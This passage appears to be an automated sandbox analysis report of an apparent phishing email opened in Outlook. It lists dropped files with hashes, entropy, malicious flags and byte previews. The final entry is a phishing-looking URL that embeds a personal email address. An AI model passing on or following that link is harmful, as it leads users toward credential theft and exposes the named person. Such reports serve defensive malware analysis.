                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                  Category:dropped
                                                  Size (bytes):73305
                                                  Entropy (8bit):7.996028107841645
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:83142242E97B8953C386F988AA694E4A
                                                  SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                                                  SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                                                  SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:MSCF....Y.......,...................I.................;Za. .authroot.stl.98.?.6..CK..<Tk......4..c... .Ec...U.d.d.E&I.DH*..M.KB."..rK.RQ*..}f..f...}..1....9...........$.8q..fa...7.o.1.0...bfsM4.........u..l..0..4.a.t....0.....6#....n. :... ....%.,CQ5uU..(.3.<7#.0..JN.$...=j|w..*.#.oU..Eq[..P..^..~.V...;..m...I|...l..@-W..=.QQ.._./.M.nZ..(.........`.$Z.9wW:W.]..8*E.......I.D{..n...K:.m..^.(.S.......c..s.y..<...2.%o.o.....H.B.R.....11.|!.(...........h.SZ........<...^....Z>.Pp?... .pT@p.#.&..........#VEV=.....p........y..."T=l.n..egf.w..X.Y..-G...........KQ.]...pM..[m..-6.wd:........T...:.P5Zs....c.oT`..F1#......EuD.......7....V ..-....!.N..%S...k...S. ...@.J..../..b!B.(=\../.l......`.\...q9..>4!b..8EH.....zdy.....#...X>%0w...i.,>c.z.g"p.S..2W.+mMs.....5Def.....#._D.4....>}...i...\.&`D.......z;..ZY.3.+t.`....z_.q'w.z.)..j3.+.co.s..:.........qK...{...E....uPO...#vs.XxH.B!..(t. 8k+.....G\..?..GF8....'..w.>.ms..\ve.nFN..W)....xi..u..5.f.l....
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):192
                                                  Entropy (8bit):2.7790941963225158
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:67B2C8BE3ABAA1E098DEAC1232127C13
                                                  SHA1:3441D2C2E1F8EE4D58AC17928C9470400EF94C52
                                                  SHA-256:0F9787ECE070FD8C62636F836F644B6DCEA2C84489BAA6C82BA86C7A3F97F409
                                                  SHA-512:DCCC69A43CB16F194D85EAE10C911098D1802E815A5644711A30F425D4095CA0D18F8CF885BDE040AF9C10C67012DB0A0F13637678C9DE9F1C0BE1C12FF95F99
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:p...... ........i.......(....................................................... ..........W.....F..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):330
                                                  Entropy (8bit):3.287136292755414
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C99C90F8D7D93628F2578133673354B5
                                                  SHA1:19A133EFB8FA5D8192FB0C1C19871FBD648F793F
                                                  SHA-256:63CA65ABDAF06795013E49D243AA0E4817AFBA14E7B0A50AC869FCB3953A6109
                                                  SHA-512:8D13AA3A8E683005463A93B7A884F4DFC3CE6179ED4A676A9A9DDA0B15736FD6428FB0F6DA02FD767B12857F370CE1741D25648B7D34080CD668F99E51C0A655
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:p...... ................(....................................................... ..................(....c*.....Y...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.4.2.7.f.6.c.2.b.7.8.7.d.b.1.:.0."...
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:PostScript document text
                                                  Category:dropped
                                                  Size (bytes):185099
                                                  Entropy (8bit):5.182478651346149
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                  SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                  SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                  SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:PostScript document text
                                                  Category:dropped
                                                  Size (bytes):0
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                  SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                  SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                  SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4
                                                  Entropy (8bit):0.8112781244591328
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:....
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2145
                                                  Entropy (8bit):5.081592085613156
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E79699B2F2C3CEDC10D8FEC6A497CDEE
                                                  SHA1:96489021B76170F3E9D5A920E9C89BA4A76E6C8B
                                                  SHA-256:34949AB5E3F3267147819788F618F9843EE59310B5CD49EADF1E9D88362E0098
                                                  SHA-512:47463F1F082D9B552C8D5B88F227ADF323D903CF27BC4DE0910CCE386F8A6E1FF63A438FF7866EF92FC8B2DA99F7B0C2047432706A37649051C8CA720D51E149
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1742202802000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"f44756c6e08822e64c0e471a2499e34d","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696585148000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"e8f53b6740aba22a83a1a569cebedbcc","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696585148000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"cc1faa6a0c714f2f0c497731f1772fa2","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696585143000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"ab062dea95f25ef019cc2f5f5f0121d4","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696583346000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"65580efad4bc88b91040ff50d71bfae9","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696583346000},{"id":"DC_Reader_Edit_LHP_Banner"
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                  Category:dropped
                                                  Size (bytes):12288
                                                  Entropy (8bit):0.9885695452520952
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4988751AFD6583B027AD6540F4F89949
                                                  SHA1:5FF77692A07AAEA16576C1A4F91349C4423BFC3C
                                                  SHA-256:24F7EC71E270712AD4A28F333CA2A27052ED2F43D03C7735C876094B0AB3776D
                                                  SHA-512:ACFC9B1E9046BE1C4E82352368F064ABBA2D78F9CAD19BFBC5F9AEA5D13A0897B48AB875FB32AD6A1074C55B2C37EA993EC3372446D79C9798F4B01251A523FC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite Rollback Journal
                                                  Category:dropped
                                                  Size (bytes):8720
                                                  Entropy (8bit):1.3443854287166197
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:88AA6575D7379B233C40BEED952CC3CC
                                                  SHA1:BD77A3F88AC595631CEFC11F1F4080C25D46D85D
                                                  SHA-256:167EE5BE0E9A7D45DFD14B9A597B13903392C9F2C601A85316B5614CA582A9A8
                                                  SHA-512:6D178581C4AFF37332E2863FCD8B5F324F774989F227729824E449EF81DCF96F8B3F8492C3B2821C2008BFFBDF5161BC50F196FD1A1E3EDE772DFCBA145DEF6A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.... .c......J .......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):246
                                                  Entropy (8bit):3.51161293806784
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BA684CA1955227D2F63CC1692643476C
                                                  SHA1:7D5BBC970C1179218D167CE1CBF37A942F58DA5D
                                                  SHA-256:A9F974912F411B2D0BC7C7DDE720AD53D462D741799743323747260E7F035261
                                                  SHA-512:31D1C1CA9078F31E278490C5ADD2C1A27013D2E0D6DA57C429B5F08C44891B180AE728DDB985DC537FB711DD4590EFA962CC32A29591CD3ED3898BD9239CB8BE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.7./.0.3./.2.0.2.5. . .0.5.:.1.3.:.2.7. .=.=.=.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):110592
                                                  Entropy (8bit):4.4927495445764745
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:AF7A827117E3943DECE11DBE3B73A48D
                                                  SHA1:9E769941AB9D2FAF7C5729B35C145E8EAEDFB2BA
                                                  SHA-256:3BCAC67A3D7FD29228DD5B10365C71EC88AFFE78DA0BEC3657D580900FACD6A5
                                                  SHA-512:0DD894BCAC0BD933F07458C54C053FF1EC95FBAC0F6D86760BC70218A014D162A6ED005283756EC41203B07BA512DEE9DEC70F50909B607EC145B7E3A1AAB826
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:............................................................................`...4...0...].......................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................+G.8...........]...............v.2._.O.U.T.L.O.O.K.:.1.b.3.0.:.1.f.5.f.7.7.0.b.c.8.1.2.4.0.9.1.a.1.6.4.6.7.8.0.7.1.f.9.1.8.7.5...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.5.0.3.1.7.T.0.5.1.3.0.1.0.9.6.5.-.6.9.6.0...e.t.l.......P.P.4...0...]...............................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:ASCII text, with very long lines (393)
                                                  Category:dropped
                                                  Size (bytes):16525
                                                  Entropy (8bit):5.353642815103214
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:91F06491552FC977E9E8AF47786EE7C1
                                                  SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                                                  SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                                                  SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):29752
                                                  Entropy (8bit):5.420556314253978
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:798C792B743EAD42FF031B43386CEC98
                                                  SHA1:C9A75CECB7E96C9394B8C4D004DC4C3620B63C67
                                                  SHA-256:FDD5784E890393563FA5F204676A15603149B81F6A59201DBB2E5594835B6A1B
                                                  SHA-512:9B7F802D277E10A151F8AF2A9126BA02357F4DF1ED4FBDFD72036ACBF024A8B711A17C334E992BC0058331AA54CF35C0E94ADEAC15BC501F6B00924DA58E3126
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                  File Type:Microsoft Outlook email folder (>=2003)
                                                  Category:dropped
                                                  Size (bytes):271360
                                                  Entropy (8bit):5.125338880187197
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F67300722FC0DA2A26A3AAA3C4D1A3CB
                                                  SHA1:8F1EE2D88B9FD06B5240A4A913C7C4F5529146FE
                                                  SHA-256:C449F8FB1EA1F6AF60188F2096F1D5604C9B73F89B54E55E7B9B64617F078F95
                                                  SHA-512:494F7D12C05A3F3BC4A52C6B18F1E41BC8582CA421BBD0C30DEE55C692020F7972EC6B9FD1E4CD3C73AC43D4C75D87DDEF6E1C4722B8BE08FA15F3E244512DA2
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:!BDNd8LwSM......\........N......M.......f................@...........@...@...................................@...........................................................................$.......D......@...............I...............L...................................................................................................................................................................................................................................................................................................,...R.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):262144
                                                  Entropy (8bit):4.485140998982984
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9EFD31F90A8D2460D4CCA8B6CB713567
                                                  SHA1:303C891CC97D1CF6CC5979775067518412EB0134
                                                  SHA-256:F59368E538114A6A21E73315473DC7B86F8AD933A8B8732E2CF41E2B8B92B459
                                                  SHA-512:D5C19303B042BFAA29CCEF0AFF0F7B1338611A572CDD5ED80D623F4289B162E7FDEC807AC186C48CA93ED0521C15F2E939CE9EE7FA9D45A525246A32C3373E67
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:a|..0...{.......0...-............D............#..............................................................|.......................................................................................................................................................................................................................................................................?...............?..............................................................................................................................................................I....D...... \.0...|.......0...-............B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):48316
                                                  Entropy (8bit):5.6346993394709
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):937
                                                  Entropy (8bit):7.737931820487441
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FC3B7BBE7970F47579127561139060E2
                                                  SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                  SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                  SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (48238)
                                                  Category:downloaded
                                                  Size (bytes):48239
                                                  Entropy (8bit):5.343270713163753
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:184E29DE57C67BC329C650F294847C16
                                                  SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                  SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                  SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                  Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (65360)
                                                  Category:downloaded
                                                  Size (bytes):182595
                                                  Entropy (8bit):4.569910209726
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B7C6E5925B4199C4C52C784D898AC084
                                                  SHA1:FBB4E0E31DA72E20D3AF55E04F9582D83EE44B07
                                                  SHA-256:841C26C62BEF85EEB70F1BB3481075A983589D661FB2672C51A593E3FD99E3CC
                                                  SHA-512:5CC9D2CA9775D9C20991B0B83CC65C1E85288ED7A25F2C98DCA6BEAD3339CEA39887BD44E9282267A0EE0445F12F8A5097F7F1EA667BA741826E95782B97D634
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yodel.co.uk
